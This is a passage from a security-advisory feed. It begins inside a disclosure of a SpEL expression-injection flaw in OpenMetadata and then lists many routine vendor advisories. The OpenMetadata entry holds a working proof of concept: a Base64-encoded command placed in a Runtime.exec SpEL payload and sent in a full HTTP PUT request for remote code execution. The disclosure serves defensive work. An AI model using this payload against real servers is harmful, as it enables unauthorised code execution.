entity) { // Resolve JSON blobs into Rule object and perform schema based validation if (entity.getFilteringRules() != null) { List<EventFilterRule> rules = entity.getFilteringRules().getRules(); // Validate all the expressions in the rule for (EventFilterRule rule : rules) { AlertUtil.validateExpression(rule.getCondition(), Boolean.class); } rules.sort(Comparator.comparing(EventFilterRule::getName)); } }````prepare()` is called from [`EntityRepository.prepareInternal()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693) which, in turn, gets called from the [`EntityResource.createOrUpdate()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219):```javapublic Response createOrUpdate(UriInfo uriInfo, SecurityContext securityContext, T entity) { repository.prepareInternal(entity, true); // If entity does not exist, this is a create operation, else update operation ResourceContext<T> resourceContext = getResourceContextByName(entity.getFullyQualifiedName()); MetadataOperation operation = createOrUpdateOperation(resourceContext); OperationContext operationContext = new OperationContext(entityType, operation); if (operation == CREATE) { CreateResourceContext<T> createResourceContext = new CreateResourceContext<>(entityType, entity); authorizer.authorize(securityContext, operationContext, createResourceContext); entity = addHref(uriInfo, repository.create(uriInfo, entity)); return new PutResponse<>(Response.Status.CREATED, entity, RestUtil.ENTITY_CREATED).toResponse(); } authorizer.authorize(securityContext, operationContext, resourceContext); PutResponse<T> response = repository.createOrUpdate(uriInfo, entity); addHref(uriInfo, response.getEntity()); return response.toResponse();}```Note that, even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and, therefore, after the SpEL expression has been evaluated.In order to reach this method, an attacker can send a PUT request to `/api/v1/events/subscriptions` which gets handled by [`EventSubscriptionResource.createOrUpdateEventSubscription()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/events/subscription/EventSubscriptionResource.java#L289):```java@PUT@Operation( operationId = "createOrUpdateEventSubscription", summary = "Updated an existing or create a new Event Subscription", description = "Updated an existing or create a new Event Subscription", responses = { @ApiResponse( responseCode = "200", description = "create Event Subscription", content = @Content( mediaType = "application/json", schema = @Schema(implementation = CreateEventSubscription.class))), @ApiResponse(responseCode = "400", description = "Bad request") })public Response createOrUpdateEventSubscription( @Context UriInfo uriInfo, @Context SecurityContext securityContext, @Valid CreateEventSubscription create) { // Only one Creation is allowed for Data Insight if (create.getAlertType() == CreateEventSubscription.AlertType.DATA_INSIGHT_REPORT) { try { repository.getByName(null, create.getName(), repository.getFields("id")); } catch (EntityNotFoundException ex) { if (ReportsHandler.getInstance() != null && ReportsHandler.getInstance().getReportMap().size() > 0) { throw new BadRequestException("Data Insight Report Alert already exists."); } } } EventSubscription eventSub = getEventSubscription(create, securityContext.getUserPrincipal().getName()); Response response = createOrUpdate(uriInfo, securityContext, eventSub); repository.updateEventSubscription((EventSubscription) response.getEntity()); return response;}```This vulnerability was discovered with the help of CodeQL's [Expression language injection (Spring)](https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection/) query.#### Proof of concept- Prepare the payload - Encode the command to be run (eg: `touch /tmp/pwned`) using Base64 (eg: `dG91Y2ggL3RtcC9wd25lZA==`) - Create the SpEL expression to run the system command: `T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))`- Send the payload using a valid JWT token:```httpPUT /api/v1/events/subscriptions HTTP/1.1Host: localhost:8585Authorization: Bearer <non-admin JWT>accept: application/jsonConnection: closeContent-Type: application/jsonContent-Length: 353{"name":"ActivityFeedAlert","displayName":"Activity Feed Alerts","alertType":"ChangeEvent","filteringRules":{"rules":[{"name":"pwn","effect":"exclude","condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]},"subscriptionType":"ActivityFeed","enabled":true}```- Verify that a file called `/tmp/pwned` was created in the OpenMetadata server#### ImpactThis issue may lead to Remote Code Execution.#### RemediationUse [`SimpleEvaluationContext`](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html) to exclude references to Java types, constructors, and bean references*.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8P5R-6MVV-2435
24.04.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-WEBSRVS-DOS-X8GNUCD2] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability (high)	A vulnerability in the management and VPN web servers for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition.This vulnerability is due to incomplete error checking when parsing an HTTP header. An attacker could exploit this vulnerability by sending a crafted HTTP request to a targeted web server on a device. A successful exploit could allow the attacker to cause a DoS condition when the device reloads.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.For more information on the vulnerability that is described in this advisory, see Cisco Event Response: Attacks Against Cisco Firewall Platforms ["https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-WEBSRVS-DOS-X8GNUCD2
24.04.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-PERSIST-RCE-FLSNXF4H] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability (high)	A vulnerability in a legacy capability that allowed for the preloading of VPN clients and plug-ins and that has been available in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerability.This vulnerability is due to improper validation of a file when it is read from system flash memory. An attacker could exploit this vulnerability by copying a crafted file to the disk0: file system of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device after the next reload of the device, which could alter system behavior. Because the injected code could persist across device reboots, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.For more information on the vulnerability that is described in this advisory, see Cisco Event Response: Attacks Against Cisco Firewall Platforms ["https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-PERSIST-RCE-FLSNXF4H
24.04.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-CMD-INJ-ZJV8WYSM] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability (medium)	A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functionality that is available in Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system with root-level privileges. Administrator-level privileges are required to exploit this vulnerability.This vulnerability exists because the contents of a backup file are improperly sanitized at restore time. An attacker could exploit this vulnerability by restoring a crafted backup file to an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system as root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.For more information on the vulnerability that is described in this advisory, see Cisco Event Response: Attacks Against Cisco Firewall Platforms ["https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-CMD-INJ-ZJV8WYSM
24.04.2024 08:23:38	ubuntu	[USN-6748-1] Sanitize vulnerabilities (medium)	Several security issues were fixed in Sanitize.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6748-1
24.04.2024 07:43:24	ubuntu	[USN-6747-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6747-1
24.04.2024 03:00:00	cisa	[CISA-2024:0424] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0424
24.04.2024 08:27:29	composer	[PHP:MDANTER-ECC-2024-04-24] Cryptographic side-channels in PHPECC		https://secdb.nttzen.cloud/security-advisory/composer/PHP:MDANTER-ECC-2024-04-24
24.04.2024 18:14:27	rustsec	[RUSTSEC-2024-0338] Arithmetic overflows in cosmwasm-std	Some mathematical operations in `cosmwasm-std` use wrapping math instead ofpanicking on overflow for very big numbers. This can lead to wrong calculations in contractsthat use these operations.Affected functions:- `Uint{256,512}::pow` / `Int{256,512}::pow`- `Int{256,512}::neg`Affected if `overflow-checks = true` is not set:- `Uint{64,128}::pow` / `Int{64,128}::pow`- `Int{64,128}::neg`	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0338
24.04.2024 03:00:00	oraclelinux	[ELSA-2024-2033] libreswan security and bug fix update (moderate)	[4.12-1.0.1.1]- Add libreswan-oracle.patch to detect Oracle Linux distro[4.12-1.1]- Fix CVE-2024-2357 (RHEL-29734)- x509: unpack IPv6 general names based on length (RHEL-32719)[4.12-1]- Update to 4.12 to fix CVE-2023-38710, CVE-2023-38711, CVE-2023-38712- Resolves: rhbz#2215956[4.9-5]- Just bumping up the version to include bugs for CVE-2023-2295. There is no code fix for it. Fix for it is including the code fix for CVE-2023-30570.- Fix CVE-2023-2295 Regression of CVE-2023-30570 fixes in the Red Hat Enterprise Linux- Resolves: rhbz#2189777, rhbz#2190148[4.9-4]- Just bumping up the version as an incorrect 9.3 build was created.- Related: rhbz#2187171[4.9-3]- Fix CVE-2023-30570:Malicious IKEv1 Aggressive Mode packets can crash libreswan- Resolves: rhbz#2187171[4.9-2]- Fix CVE-2023-23009: remote DoS via crafted TS payload with an incorrect selector length (rhbz#2173674)[4.9-1]- Update to 4.9. Resolves: rhbz#2128669- Switch to using %autopatch as in Fedora	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2033
24.04.2024 17:13:51	rustsec	[RUSTSEC-2024-0337] The crate `zip_next` has been renamed to `zip`.	Please switch to the new name. `zip_next` will receive no further releases.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0337
26.04.2024 01:23:15	ubuntu	[USN-6754-1] nghttp2 vulnerabilities (high)	Several security issues were fixed in nghttp2.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6754-1
25.04.2024 23:59:19	ubuntu	[USN-6753-1] CryptoJS vulnerability (critical)	CryptoJS could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6753-1
25.04.2024 23:13:57	ubuntu	[USN-6751-1] Zabbix vulnerabilities (medium)	Zabbix could allow reflected cross-site scripting (XSS) attacks.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6751-1
26.04.2024 02:34:45	maven	[MAVEN:GHSA-MV64-86G8-CQQ7] Quarkus: security checks in resteasy reactive may trigger a denial of service (moderate)	A flaw was discovered in the RESTEasy Reactive implementation in Quarkus. Due to security checks for some JAX-RS endpoints being performed after serialization, more processing resources are consumed while the HTTP request is checked. In certain configurations, if an attacker has knowledge of any POST, PUT, or PATCH request paths, they can potentially identify vulnerable endpoints and trigger excessive resource usage as the endpoints process the requests. This can result in a denial of service.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MV64-86G8-CQQ7
25.04.2024 22:57:36	maven	[MAVEN:GHSA-9WMF-XF3H-R8PR] Jberet: jberet-core logging database credentials (moderate)	A vulnerability was found in jberet-core logging. An exception in 'dbProperties' might display user credentials such as the username and password for the database-connection.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9WMF-XF3H-R8PR
25.04.2024 22:54:41	maven	[MAVEN:GHSA-25W4-HFQG-4R52] Quarkus: authorization flaw in quarkus resteasy reactive and classic (moderate)	A flaw was found in Quarkus. When a Quarkus RestEasy Classic or Reactive JAX-RS endpoint has its methods declared in the abstract Java class or customized by Quarkus extensions using the annotation processor, the authorization of these methods will not be enforced if it is enabled by either 'quarkus.security.jaxrs.deny-unannotated-endpoints' or 'quarkus.security.jaxrs.default-roles-allowed' properties.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-25W4-HFQG-4R52
25.04.2024 21:03:46	slackware	[SSA:2024-116-01] libarchive (high)	New libarchive packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libarchive-3.7.3-i586-2_slack15.0.txz: Rebuilt. Patched an out-of-bound error in the rar e8 filter that could allow for the execution of arbitrary code. Thanks to gmgf for the heads-up. For more information, see: https://github.com/advisories/GHSA-2jc9-36w4-pmqw https://www.cve.org/CVERecord?id=CVE-2024-26256 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libarchive-3.7.3-i586-2_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libarchive-3.7.3-x86_64-2_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libarchive-3.7.3-i586-2.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libarchive-3.7.3-x86_64-2.txzMD5 signaturesSlackware 15.0 package:52740a0d6b013049b82d69ed3f84b8be libarchive-3.7.3-i586-2_slack15.0.txzSlackware x86_64 15.0 package:182956f6064878e1f981297c3cf21d63 libarchive-3.7.3-x86_64-2_slack15.0.txzSlackware -current package:360dd49a8f464b91f1f484f2c3cd5973 l/libarchive-3.7.3-i586-2.txzSlackware x86_64 -current package:e557e74eda420e85669c2cc7eb9b2500 l/libarchive-3.7.3-x86_64-2.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libarchive-3.7.3-i586-2_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-116-01
25.04.2024 17:39:56	ubuntu	[USN-6752-1] FreeRDP vulnerabilities (critical)	Several security issues were fixed in FreeRDP.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6752-1
25.04.2024 13:15:08	alpinelinux	[ALPINE:CVE-2024-25583] pdns-recursor vulnerability (high)	[From CVE-2024-25583] A crafted response from an upstream server the recursor has been configured to forward-recurse to can cause a Denial of Service in the Recursor. The default configuration of the Recursor does not use recursive forwarding and is not affected.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-25583
25.04.2024 10:15:45	alpinelinux	[ALPINE:CVE-2023-6237] openssl vulnerability	[From CVE-2023-6237] Issue summary: Checking excessively long invalid RSA public keys may takea long time.Impact summary: Applications that use the function EVP_PKEY_public_check()to check RSA public keys may experience long delays. Where the key thatis being checked has been obtained from an untrusted source this may leadto a Denial of Service.When function EVP_PKEY_public_check() is called on RSA public keys,a computation is done to confirm that the RSA modulus, n, is composite.For valid RSA keys, n is a product of two or more large primes and thiscomputation completes quickly. However, if n is an overly large prime,then this computation would take a long time.An application that calls EVP_PKEY_public_check() and supplies an RSA keyobtained from an untrusted source could be vulnerable to a Denial of Serviceattack.The function EVP_PKEY_public_check() is not called from other OpenSSLfunctions however it is called from the OpenSSL pkey command lineapplication. For that reason that application is also vulnerable if usedwith the '-pubin' and '-check' options on untrusted data.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are affected by this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6237
25.04.2024 06:24:59	ubuntu	[USN-6750-1] Thunderbird vulnerabilities	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6750-1
25.04.2024 03:00:00	debian	[DSA-5674-1] pdns-recursor (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5674-1
25.04.2024 03:00:00	oraclelinux	[ELSA-2024-1902] shim security update (important)	[15.8-4.0.1]- Add support for Oracle signed shim [Orabug: 36540084]- Add shim binaries signed with Oracle Secure Boot Signing (key 1) [Orabug: 36540084][15.8-1.0.3]- Update shimx64.efi, shimia32.efi and shimaa64.efi v15.8 signed by Microsoft [Orabug: 36072863][15.8-1.0.2]- Use binaries with correct shim.ol generation [Orabug: 36072863]- Set SBAT_AUTOMATIC_DATE=2021030218 [Orabug: 36072863][15.8-1.0.1]- Update to 15.8 [Orabug: 36072863]- fix CVE-2023-40546, CVE-2023-40547, CVE-2023-40548, CVE-2023-40549, CVE-2023-40550, CVE-2023-40551 [Orabug: 36072863]	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1902
25.04.2024 03:00:00	oraclelinux	[ELSA-2024-2055] buildah security update (important)	[1.31.5-1.0.1]- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117178][1:1.31.5-1]- update to the latest content of https://github.com/containers/buildah/tree/release-1.31 (https://github.com/containers/buildah/commit/5fd539c)- Resolves: RHEL-26775	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2055
26.04.2024 19:03:18	go	[GO-2024-2744] Access control change may take longer than expected in github.com/authelia/authelia/v4	If the file authentication backend is being used, the ewatch option is setto true, the refresh interval is configured to a non-disabled value, and anadministrator changes a user's groups, then that user may be able to accessresources that their previous groups had access to.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2744
26.04.2024 19:03:05	go	[GO-2024-2743] XSS vulnerability via personal website in github.com/apache/incubator-answer		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2743
26.04.2024 03:00:00	debian	[DSA-5675-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5675-1
28.04.2024 03:00:00	freebsd	[FREEBSD:B3AFFEE8-04D1-11EF-8928-901B0EF714D4] py-social-auth-app-django -- Improper Handling of Case Sensitivity	GitHub Advisory Database: Python Social Auth is a social authentication/registration mechanism. Prior to version 5.4.1, due to default case-insensitive collation in MySQL or MariaDB databases, third-party authentication user IDs are not case-sensitive and could cause different IDs to match. This issue has been addressed by a fix released in version 5.4.1. An immediate workaround would be to change collation of the affected field.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B3AFFEE8-04D1-11EF-8928-901B0EF714D4
26.04.2024 08:01:53	maven	[MAVEN:GHSA-2WRP-6FG6-HMC5] Spring Framework URL Parsing with Host Validation (high)	Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.This is the same as CVE-2024-22259 https://spring.io/security/cve-2024-22259 and CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2WRP-6FG6-HMC5
29.04.2024 19:44:07	ubuntu	[USN-6759-1] FreeRDP vulnerabilities (critical)	Several security issues were fixed in FreeRDP.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6759-1
29.04.2024 17:19:01	ubuntu	[USN-6757-1] PHP vulnerabilities (medium)	Several security issues were fixed in PHP.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6757-1
29.04.2024 16:04:18	ubuntu	[USN-6744-3] Pillow vulnerability (medium)	Pillow could be made to crash or run programs as an administratorif it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6744-3
29.04.2024 14:43:27	ubuntu	[USN-6734-2] libvirt vulnerabilities (medium)	Several security issues were fixed in libvirt.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6734-2
29.04.2024 14:38:34	ubuntu	[USN-6733-2] GnuTLS vulnerabilities (medium)	Several security issues were fixed in GnuTLS.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6733-2
29.04.2024 14:34:42	ubuntu	[USN-6718-3] curl vulnerabilities	Several security issues were fixed in curl.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6718-3
29.04.2024 14:31:21	ubuntu	[USN-6729-3] Apache HTTP Server vulnerabilities	Several security issues were fixed in Apache HTTP Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6729-3
29.04.2024 14:27:19	ubuntu	[USN-6737-2] GNU C Library vulnerability	GNU C Library could be made to crash or run programs if it processedspecially crafted data.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6737-2
29.04.2024 14:23:13	ubuntu	[USN-6755-1] GNU cpio vulnerabilities (medium)	GNU cpio could be made to write files outside the target directory.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6755-1
29.04.2024 13:18:57	ubuntu	[USN-6756-1] less vulnerability	less could be made run programs as your login if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6756-1
29.04.2024 07:15:08	alpinelinux	[ALPINE:CVE-2024-2757] php83 vulnerability (high)	[From CVE-2024-2757] In PHP 8.3.* before 8.3.5, function mb_encode_mimeheader() runs endlessly for some inputs that contain long strings of non-space characters followed by a space. This could lead to a potential DoS attack if a hostile user sends data to an application that uses this function.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-2757
29.04.2024 07:15:08	alpinelinux	[ALPINE:CVE-2024-3096] php82, php83, php81 vulnerability (medium)	[From CVE-2024-3096] In PHP version 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, if a password stored with password_hash() starts with a null byte (\x00), testing a blank string as the password via password_verify() will incorrectly return true.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-3096
29.04.2024 07:15:07	alpinelinux	[ALPINE:CVE-2024-1874] php83, php82, php81 vulnerability (critical)	[From CVE-2024-1874] In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using XXXXXXXXX() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-1874
29.04.2024 07:15:07	alpinelinux	[ALPINE:CVE-2024-2756] php82, php83, php81 vulnerability (medium)	[From CVE-2024-2756] Due to an incomplete fix to CVE-2022-31629 https://github.com/advisories/GHSA-c43m-486j-j32p , network and same-site attackers can set a standard insecure cookie in the victim's browser which is treated as a __Host- or __Secure- cookie by PHP applications.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-2756
29.04.2024 03:00:00	oraclelinux	[ELSA-2024-2084] container-tools:4.0 security update (important)	buildah[1.24.7-1]- bump to v1.24.7- Resolves: RHEL-26767cockpit-podmanconmoncontainernetworking-pluginscontainers-commoncontainer-selinuxcriucrunfuse-overlayfslibslirpoci-seccomp-bpf-hookpodmanpython-podmanrunc[1.1.12-1.0.1]- rebuild with golang 1.20.12 for CVE-2023-39326skopeoslirp4netnsudica	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2084
29.04.2024 03:00:00	redhat	[RHSA-2024:2084] container-tools:4.0 security update (important)	The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* buildah: full container escape at build time (CVE-2024-1753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2084
29.04.2024 03:00:00	redhat	[RHSA-2024:2098] container-tools:rhel8 security and bug fix update (important)	The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Bug Fix(es):* container_init_t does not possess ptrace process context [rhel-8.9.0.z] (JIRA:RHEL-28923)Security Fix(es):* podman: full container escape at build time (CVE-2024-1753)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2098
29.04.2024 03:00:00	redhat	[RHSA-2024:2079] git-lfs security update (important)	Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.Security Fix(es):* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288,VU#421644.3)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2079
29.04.2024 03:00:00	oraclelinux	[ELSA-2024-2080] tigervnc security update (important)	[1.8.0-33.0.1]- Dropped xorg-CVE-2023-5367.patch, xorg-CVE-2023-6816.patch, xorg-CVE-2023-6377.patch, xorg-CVE-2023-6478.patch, xorg-CVE-2024-0229-1.patch, xorg-CVE-2024-0229-2.patch, xorg-CVE-2024-0229-3.patch, xorg-CVE-2024-21885.patch, xorg-CVE-2024-21886-1.patch, xorg-CVE-2024-21886-2.patch, xorg-dix-fix-use-after-free-in-input-device-shutdown.patch, xorg-CVE-2024-31080.patch, xorg-CVE-2024-31081.patch, xorg-CVE-2024-31082.patch, xorg-CVE-2024-31083.patch, xorg-CVE-2024-31083-followup.patch[1.8.0-33]- Fix crash caused by fix for CVE-2024-31083 Resolves: RHEL-30976[1.8.0-32]- Fix CVE-2024-31080 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents Resolves: RHEL-31006- Fix CVE-2024-31083 tigervnc: xorg-x11-server: User-after-free in ProcRenderAddGlyphs Resolves: RHEL-30976- Fix CVE-2024-31081 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice Resolves: RHEL-30993	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2080
29.04.2024 03:00:00	redhat	[RHSA-2024:2080] tigervnc security update (important)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents(CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice(CVE-2024-31081)* xorg-x11-server: User-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2080
29.04.2024 10:56:05	almalinux	[ALSA-2024:2055] buildah security update (important)	buildah security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2055
29.04.2024 11:47:39	almalinux	[ALSA-2024:2037] tigervnc security update (important)	tigervnc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2037
29.04.2024 10:55:12	almalinux	[ALSA-2024:2033] libreswan security and bug fix update (moderate)	libreswan security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2033
29.04.2024 10:51:17	almalinux	[ALSA-2024:1962] go-toolset:rhel8 security update (important)	go-toolset:rhel8 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1962
29.04.2024 10:54:15	almalinux	[ALSA-2024:1998] libreswan security update (moderate)	libreswan security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1998
29.04.2024 10:53:24	almalinux	[ALSA-2024:1963] golang security update (important)	golang security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1963
29.04.2024 10:46:06	almalinux	[ALSA-2024:1939] thunderbird security update (low)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1939
29.04.2024 10:48:43	almalinux	[ALSA-2024:1940] thunderbird security update (low)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1940
29.04.2024 14:02:39	almalinux	[ALSA-2024:1822] java-11-openjdk security update (moderate)	java-11-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1822
29.04.2024 14:04:52	almalinux	[ALSA-2024:1828] java-21-openjdk security update (moderate)	java-21-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1828
01.05.2024 01:40:45	ubuntu	[USN-6760-1] Gerbv vulnerability (medium)	Gerbv could be made to crash if it opened a specially crafted input file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6760-1
30.04.2024 13:50:09	ubuntu	[USN-6758-1] JSON5 vulnerability (high)	JSON5 could allow unintended access to network services or have otherunspecified impact.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6758-1
30.04.2024 10:33:26	ubuntu	[USN-6761-1] Anope vulnerability	Anope could be made to bypass authentication checks for suspended accounts.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6761-1
30.04.2024 03:00:00	cisa	[CISA-2024:0430] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0430
